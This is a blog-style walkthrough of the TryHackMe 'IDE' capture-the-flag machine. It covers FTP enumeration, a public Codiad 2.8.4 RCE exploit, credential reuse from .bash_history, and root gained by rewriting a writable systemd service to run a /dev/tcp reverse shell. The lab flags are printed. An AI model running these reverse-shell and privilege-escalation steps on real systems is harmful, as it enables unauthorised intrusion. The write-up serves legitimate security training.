In this write-up, I will walk through my process of exploiting the TryHackMe IDE machine, gaining an initial foothold, escalating privileges, and ultimately capturing the root flag.
Enumeration
1. Scanning for Open Ports
I started with an Nmap scan to discover open services:
nmap -sC -sV -p- <TARGET_IP>
This revealed the following key findings:
- FTP (Port 21) – Allowed anonymous login.
- HTTP (Port 80) – Hosting a web application.
- HTTP (Port 62337) – Hosting Codiad 2.8.4, a web-based IDE.
2. FTP Enumeration
Anonymous FTP access was enabled, allowing me to browse directories:
ftp 10.10.123.202
Running ls revealed a hidden directory ... with a text file containing:
Hey john,
I have reset the password as you have asked. Please use the default password to login.
Also, please take care of the image file ;)
- drac.
This suggested that a user named John had a default password.
3. Exploiting Codiad (Authenticated RCE)
Navigating to port 62337 revealed Codiad 2.8.4, a known vulnerable IDE. Since the FTP note hinted at default credentials, I tried:
Username: john
Password: password
This successfully logged me into Codiad!
Exploiting Codiad 2.8.4 for RCE
Using a public exploit (searchsploit confirmed RCE vulnerability):
searchsploit codiad 2.8.4 10.10.123.202
I used an authenticated RCE exploit:
python3 49705.py http://10.10.123.202:62337 john password <MY_IP> 4444 linux
This provided me with a reverse shell as www-data.
Privilege Escalation
1. Finding Credentials in .bash_history
Checking drac‘s home directory, I found MySQL credentials in .bash_history:
mysql -u drac -p 'Th3dRaCULa1sR3aL'
I attempted to SSH into the box using these credentials:
ssh [email protected]
With success, I now had shell access as drac!
I grabbed the user.txt flag
user.txt:02930d21a8eb009f6d26361b2d24a4662. Abusing Writable vsftpd.service for Root Access
Running LinPEAS flagged /systemd/system/multi-user.target.wants/vsftpd.service as writable (RED alert – 95% PE chance). Listing its contents:
cat /systemd/system/multi-user.target.wants/vsftpd.service
The original configuration contained:
[Service]
Type=simple
ExecStart=/usr/sbin/vsftpd /etc/vsftpd.conf
Since this file was writable, I modified it to execute a reverse shell:
[Unit]
Description=vsftpd FTP server
After=network.target
[Service]
Type=simple
ExecStart=/home/drac/shell.sh
ExecReload=/bin/kill -HUP $MAINPID
ExecStartPre=-/bin/mkdir -p /var/run/vsftpd/empty
[Install]
WantedBy=multi-user.target
/lib/systemd/system/vsftpd.service
3. Creating the Payload Script
I created /home/drac/shell.sh to spawn a root shell:
sh -i >& /dev/tcp/10.2.29.4/4444 0>&1
chmod +x /home/drac/shell.sh
4. Reloading Systemd and Restarting vsftpd
Since systemd needed to reload before applying changes, I ran:
systemctl daemon-reload
Then restarted vsftpd:
sudo service vsftpd restart
5. Catching the Root Shell
On my Kali machine, I set up a listener:
nc -lvnp 4444
Within seconds, I had a root shell!
Root Flag
cat /root/root.txt
root.txt:ce258cb16f47f1c66f0b0b77f4e0fb8d
💻 Follow my journey at TheWireshark.com! 🔥